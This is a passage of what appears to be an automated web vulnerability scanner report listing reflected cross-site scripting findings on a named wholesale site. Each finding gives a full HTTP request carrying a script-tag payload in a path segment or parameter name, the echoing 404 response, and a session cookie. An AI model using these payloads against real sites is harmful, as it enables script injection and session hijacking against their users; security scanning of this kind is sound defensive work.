The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f3447<script>alert(1)</script>b518b8be685 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/search.php?keyword=search...&Submit3=Search&opt=2&f3447<script>alert(1)</script>b518b8be685=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/search.php?keyword=search...&Submit3=Search&opt=2&f3447<script>alert(1)</script>b518b8be685=1 was not found on this server.</p>
...[SNIP]...

2.3845. http://www.resellerbase.com/goods-wholesale/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 37b52<a>c85ee83fcd6 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/search.php?keyword=search...&Submit3=Search&opt=237b52<a>c85ee83fcd6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/search.php?keyword=search...&Submit3=Search&opt=237b52<a>c85ee83fcd6 was not found on this server.</p>
...[SNIP]...

2.3846. http://www.resellerbase.com/goods-wholesale/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 51ace<script>alert(1)</script>bcac2824f84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale51ace<script>alert(1)</script>bcac2824f84/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale51ace<script>alert(1)</script>bcac2824f84/themes/ was not found on this server.</p>
...[SNIP]...

2.3847. http://www.resellerbase.com/goods-wholesale/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 785e6<script>alert(1)</script>219e22169a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes785e6<script>alert(1)</script>219e22169a3/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes785e6<script>alert(1)</script>219e22169a3/ was not found on this server.</p>
...[SNIP]...

2.3848. http://www.resellerbase.com/goods-wholesale/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 59e21<script>alert(1)</script>6791d7afa15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/?59e21<script>alert(1)</script>6791d7afa15=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/?59e21<script>alert(1)</script>6791d7afa15=1 was not found on this server.</p>
...[SNIP]...

2.3849. http://www.resellerbase.com/goods-wholesale/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 97a87<script>alert(1)</script>c1541ebaad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale97a87<script>alert(1)</script>c1541ebaad/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale97a87<script>alert(1)</script>c1541ebaad/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3850. http://www.resellerbase.com/goods-wholesale/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 89a7c<script>alert(1)</script>bf0eb455ca3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes89a7c<script>alert(1)</script>bf0eb455ca3/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes89a7c<script>alert(1)</script>bf0eb455ca3/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3851. http://www.resellerbase.com/goods-wholesale/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 240a7<script>alert(1)</script>a0e4733e2c7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos240a7<script>alert(1)</script>a0e4733e2c7/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos240a7<script>alert(1)</script>a0e4733e2c7/ was not found on this server.</p>
...[SNIP]...

2.3852. http://www.resellerbase.com/goods-wholesale/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b1b8a<script>alert(1)</script>6fe01bc043e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/?b1b8a<script>alert(1)</script>6fe01bc043e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/?b1b8a<script>alert(1)</script>6fe01bc043e=1 was not found on this server.</p>
...[SNIP]...

2.3853. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3d621<script>alert(1)</script>95cf1483a35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale3d621<script>alert(1)</script>95cf1483a35/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale3d621<script>alert(1)</script>95cf1483a35/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3854. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 76cc7<script>alert(1)</script>73b48d1d80f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes76cc7<script>alert(1)</script>73b48d1d80f/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes76cc7<script>alert(1)</script>73b48d1d80f/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3855. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ded4d<script>alert(1)</script>dc41444be5a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmosded4d<script>alert(1)</script>dc41444be5a/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmosded4d<script>alert(1)</script>dc41444be5a/images/ was not found on this server.</p>
...[SNIP]...

2.3856. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ba6e4<script>alert(1)</script>60caf04397d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/imagesba6e4<script>alert(1)</script>60caf04397d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/imagesba6e4<script>alert(1)</script>60caf04397d/ was not found on this server.</p>
...[SNIP]...

2.3857. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 82825<script>alert(1)</script>4cbee905304 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/?82825<script>alert(1)</script>4cbee905304=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/?82825<script>alert(1)</script>4cbee905304=1 was not found on this server.</p>
...[SNIP]...

2.3858. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 634fa<script>alert(1)</script>adea212d9a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale634fa<script>alert(1)</script>adea212d9a6/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale634fa<script>alert(1)</script>adea212d9a6/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3859. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dffa8<script>alert(1)</script>2a08be7540c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themesdffa8<script>alert(1)</script>2a08be7540c/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themesdffa8<script>alert(1)</script>2a08be7540c/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3860. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 83885<script>alert(1)</script>5ad2ac45be6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos83885<script>alert(1)</script>5ad2ac45be6/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos83885<script>alert(1)</script>5ad2ac45be6/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3861. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7fc5b<script>alert(1)</script>0ad2549057b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images7fc5b<script>alert(1)</script>0ad2549057b/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images7fc5b<script>alert(1)</script>0ad2549057b/rating/ was not found on this server.</p>
...[SNIP]...

2.3862. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e4641<script>alert(1)</script>09b0ba96bca was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/ratinge4641<script>alert(1)</script>09b0ba96bca/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/ratinge4641<script>alert(1)</script>09b0ba96bca/ was not found on this server.</p>
...[SNIP]...

2.3863. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9b86c<script>alert(1)</script>b7db9a85109 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/rating/?9b86c<script>alert(1)</script>b7db9a85109=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
